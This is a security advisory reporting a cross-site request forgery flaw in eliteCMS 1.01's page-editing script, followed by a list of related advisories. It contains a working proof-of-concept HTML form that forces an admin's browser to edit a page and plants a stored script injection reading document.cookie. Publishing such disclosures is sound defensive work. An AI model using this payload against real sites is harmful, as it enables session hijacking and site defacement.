XSRF (CSRF) in eliteCMS

Vulnerability ID: HTB22355
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_elitecms.html
Product: eliteCMS
Vendor: Elite Graphix
Vulnerable Version: 1.01 and Probably Prior Versions
Vendor Notification: 19 April 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/admin/edit_page.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action='http://www.example.com/admin/edit_page.php?page=1' name="frm" method='post' >
<input name="title" type="hidden" value="Home"/>
<input name="keywords" type="hidden" value="eliteCMS, Elite CMS" />
<input name="description" type="hidden" value='"><script>alert(document.cookie)</script>' />
<input name="menu_name" type="hidden" value="Home"/>
<input name="position" type="hidden" value="1"/>
<input name="active" type="hidden" value="1" />
<input name="home_page" type="hidden" value="1" />
<input name="sidebar" type="hidden" value="1" />
<input name="sidebar_align" type="hidden" value="left" />
<input name="contact_form" type="hidden" value="0" />
<input type="submit" name="submit" value="Update Page" />

Relevant Pages

  • Multiple vulnerabilities in Template CMS
    ... Advisory ID: HTB23115 ... Product: Template CMS ... Vendor Notification: September 12, 2012 ... The following PoC demonstrates the vulnerability: ...
  • [SIG^2 G-TEC] 602LAN SUITE Web Mail Vulnerability Allows File Upload to Arbitrary Directories
    ... SIG^2 Vulnerability Research Advisory ... 602LAN SUITE Web Mail Vulnerability Allows File Upload to Arbitrary Directories ... 24 Jan 05 - Second Vendor Notification using online Bug Report Form and Email. ...
  • Re: Tinyguestbook XSS
    ... There is no sanitation on the input of the msg variable. ... malicious scripts to be added. ... There is also SQL-injection vulnerability, ...
  • Path Traversal in DeWeS Web Server (Twilight CMS)
    ... Vendor Notification: July 24, 2013 ... High-Tech Bridge Security Research Lab discovered path traversal vulnerability in DeWeS web server that is supplied in package with Twilight CMS, which can be exploited to read arbitrary files on vulnerable system. ...
  • Cross-Site Scripting (XSS) in Kayako Fusion
    ... Advisory ID: HTB23095 ... Vendor Notification: June 6, 2012 ... High-Tech Bridge SA Security Research Lab has discovered vulnerability in Kayako Fusion, which can be exploited to perform Cross-Site Scripting attacks. ...